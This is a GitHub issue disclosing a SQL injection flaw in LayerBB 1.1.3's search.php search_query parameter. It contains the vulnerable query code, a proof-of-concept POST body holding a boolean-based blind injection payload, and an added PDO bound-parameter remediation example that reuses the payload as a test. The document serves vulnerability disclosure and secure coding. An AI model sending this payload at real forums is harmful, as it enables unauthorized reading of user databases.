
SQL injection vulnerability #51

Open
yaoyao6688 opened this issue Oct 10, 2019 · 1 comment

@yaoyao6688

LayerBB 1.1.3 has SQL Injection via the search.php search_query parameter.

Steps to Reproduce Issue

In search.php, lines 86-91:

```php
if ((isset($_POST['user_search']) && isset($_POST['search_type'])) || !isset($_POST['search_type'])) {
    $MYSQL->bind('search_query', $search_query);
    $query = $MYSQL->query("SELECT * FROM {prefix}users WHERE username LIKE CONCAT('%',:search_query,'%');");
    // ... remainder of the block not included in the report
}
```
Unfiltered search_query results in SQL injection
POC

Packet parameters:

```text
search_query=admin' RLIKE (SELECT (CASE WHEN (5268=5268) THEN 0x61646d696e ELSE 0x28 END)) AND 'GdPB'='GdPB&time_from=1996&time_to=2019&user_search=on&search_type=advanced&search_submit=Search
```

Server Environment (PHP, MySQL, Apache Version and Operating System):
version 1.1.3
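
The remediation for a report like this is to pass the search term to the database as a real bound parameter instead of splicing it into the query text, and to add the LIKE wildcards on the PHP side so the whole pattern travels as one string value. The block below is an added example written for this page, not LayerBB's code or its `$MYSQL` wrapper: it uses PHP's PDO with a named placeholder, an in-memory SQLite table constructed for the demonstration, and an assumed `layerbb_` table prefix and `id`/`username` columns. The payload from the report, run through this function, is compared as a literal username and matches nothing; the `SELECT ... CASE` inside it is never parsed as SQL.

```php
<?php
// Added example (not LayerBB code): user search with a bound LIKE pattern.
declare(strict_types=1);

/**
 * Escape LIKE metacharacters so a user term cannot act as a wildcard.
 * '!' is used as the escape character because it is portable between
 * MySQL and SQLite (a backslash would need different quoting on each).
 */
function escapeLikeTerm(string $term): string
{
    return str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $term);
}

/**
 * Return users whose username contains $term.
 * $pdo is assumed to be a PDO connection; $prefix is trusted config.
 */
function searchUsers(PDO $pdo, string $term, string $prefix = 'layerbb_'): array
{
    // The table prefix is application configuration, never user input,
    // so it is validated before being placed into the SQL text.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $prefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }

    $sql = "SELECT id, username FROM {$prefix}users "
         . "WHERE username LIKE :pattern ESCAPE '!'";
    $stmt = $pdo->prepare($sql);
    // Wildcards are added here; the complete pattern is a single bound
    // string parameter, so quotes or keywords in $term stay data.
    $stmt->bindValue(':pattern', '%' . escapeLikeTerm($term) . '%', PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demonstration data using SQLite so the script runs offline.
// With pdo_mysql, also set PDO::ATTR_EMULATE_PREPARES to false so binding
// is done by the server rather than by the client library.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE layerbb_users (id INTEGER PRIMARY KEY, username TEXT)');
$pdo->exec("INSERT INTO layerbb_users (username) VALUES ('admin'), ('administrator'), ('guest')");

// An ordinary search term.
print_r(searchUsers($pdo, 'admin'));

// The search_query value from the report above, passed as a plain string.
$payload = "admin' RLIKE (SELECT (CASE WHEN (5268=5268) THEN 0x61646d696e ELSE 0x28 END)) AND 'GdPB'='GdPB";
print_r(searchUsers($pdo, $payload));
```

The first call returns the two usernames containing `admin`; the second returns an empty array, because the bound value must appear literally in a username. Escaping `%` and `_` is a separate concern from injection: without it a user could still turn a search into an unbounded wildcard scan, which matters for a table the query reads with `SELECT *`.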

@AndyRixon AndyRixon self-assigned this Nov 7, 2019
@AndyRixon AndyRixon added the bug label Nov 7, 2019
@AndyRixon AndyRixon added this to the 1.1.4 milestone Nov 7, 2019
@AndyRixon
Owner

I've had some major issues with the entire search system; I will take a look into this one further.
